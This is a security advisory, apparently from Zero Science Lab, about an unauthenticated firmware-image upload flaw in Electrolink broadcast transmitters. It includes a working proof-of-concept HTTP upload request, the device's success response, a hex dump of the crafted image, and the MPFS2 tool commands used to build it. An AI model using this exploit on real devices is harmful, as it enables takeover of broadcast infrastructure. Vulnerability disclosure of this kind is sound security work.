Electrolink FM/DAB/TV Transmitter Pre-Auth MPFS Image Remote Code Execution Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The device allows access to an unprotected endpoint that allows MPFS File System binary image upload without authentication. The MPFS2 file system module provides a light-weight read-only file system that can be stored in external EEPROM, external serial Flash, or internal Flash program memory. This file system serves as the basis for the HTTP2 web server module, but is also used by the SNMP module and is available to other applications that require basic read-only storage capabilities. This can be exploited to overwrite the flash program memory that holds the web server's main interfaces and execute arbitrary code. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5796 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5796.php Ref: https://documentation.help/Microchip-TCP.IP-Stack/GS-MPFSUpload.html 30.06.2023 -- POST /upload HTTP/1.1 Host: 192.168.150.77:8888 Content-Length: 251 Cache-Control: max-age=0 Content-Type: multipart/form-data; boundary=----joxypoxy User-Agent: MPFS2_PoC/1.0c Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: Login=IgnoreMePlsKtnx Connection: close ------joxypoxy Content-Disposition: form-data; name="i"; filename="MPFSimg.bin" Content-Type: application/octet-stream MPFS... -----joxypoxy-- HTTP/1.1 200 OK Connection: close Content-Type: text/html MPFS Update Successful

Site main page --- hd htm: 0d 0a 4d 50 46 53 02 01 01 00 8a 43 20 00 00 00 MPFS.......C.... 2b 00 00 00 30 00 00 00 02 44 eb 64 00 00 00 00 +...0....D.d.... 00 00 69 6e 64 65 78 32 2e 68 74 6d 00 3c 68 74 ..index0.htm...ZSL< ... ... 64 6f 73 21 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 2d dos!..</html>..- --- MPFS Structure: [M][P][F][S] [BYTE Ver Hi][BYTE Ver Lo][WORD Number of Files] [Name Hash 0][Name Hash 1]...[Name Hash N] [File Record 0][File Record 1]...[File Record N] [String 0][String 1]...[String N] [File Data 0][File Data 1]...[File Data N] --- C:\>javaw -jar MPFS2.jar C:\>mpfs2 -v -l MPFSimg.bin Version: 2.1 Number of files: 1 (1 regular, 0 index) Number of dynamic variables: 0 FileRecord 0: .StringPtr = 32 index0.htm .DataPtr = 43 .Len = 48 .Timestamp = 2023-08-27T14:39:30Z .Flags = 0